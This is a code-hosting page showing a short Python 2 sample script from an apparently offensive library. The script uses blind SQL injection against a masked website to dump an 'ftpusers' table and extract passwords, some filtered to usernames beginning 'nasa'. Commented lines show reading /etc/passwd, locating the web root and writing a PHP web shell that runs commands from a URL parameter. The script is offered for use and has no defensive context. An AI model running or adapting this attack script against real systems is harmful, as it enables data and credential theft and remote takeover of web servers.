PageRenderTime 24ms CodeModel.GetById 17ms RepoModel.GetById 0ms app.codeStats 0ms

/samples/energypeopletrust.py

https://bitbucket.org/sha0coder/pylibhack
Python | 55 lines | 14 code | 10 blank | 31 comment | 0 complexity | eee4af11c3343a7a3876c94dd29f2fec MD5 | raw file
  1. #!/usr/bin/python2
  2. import sys
  3. sys.path.append("..")
  4. from web.sqlInjection import *
  5. b = BlindMySQL()
  6. #b.form = 'formuB'
  7. b.goodguy = 'success'
  8. #b.debug = True
  9. b.outfile = 'data'
  10. b.post = 0
  11. b.param = 'video'
  12. b.url = "http://www.xxxx.com/film.php?"
  13. #b.getDatabases()
  14. #b.getTables('ftpusers')
  15. #b.getColumns('ftpusers','users')
  16. b.dumpTable('ftpusers','users')
  17. #b.getData('ftpusers','users','gid')
  18. b.getDataFiltered('ftpusers','user',"user like 'nasa%'",'password')
  19. b.words.clear()
  20. b.words.hexa()
  21. #or:
  22. #b.nums(1)
  23. #b.words += ['a','b','c','d','e','f']
  24. #words is a Wordlist object ;)
  25. b.getData('ftpusers','users','password')
  26. #b = BlindMySQL()
  27. #b.form = 'formuB'
  28. #b.badguy = '0 Resultados'
  29. #b.goodguy = 'hay resultados'
  30. #b.outfile = 'out'
  31. #b.post = 1
  32. #b.param = 'busca'
  33. #b.url = 'http://www.oxxx.org/test'
  34. #b.getDatabases()
  35. #b.getTables('database')
  36. #b.getColumns('database','table')
  37. #b.getData('database','table','user')
  38. #b.getDataFiltered('database','table','user','admin','password')
  39. #b.existsFile('/etc/passwd')
  40. #b.getDocumentRoot()
  41. #b.getFile('/etc/passwd')
  42. #b.writeFile('/var/www/shell.php','<?php eval($_GET["cmd"]); ?>');
  43. #b.isRoot()
  44. #b.dumpTable()
  45. #b.dumpAllDB()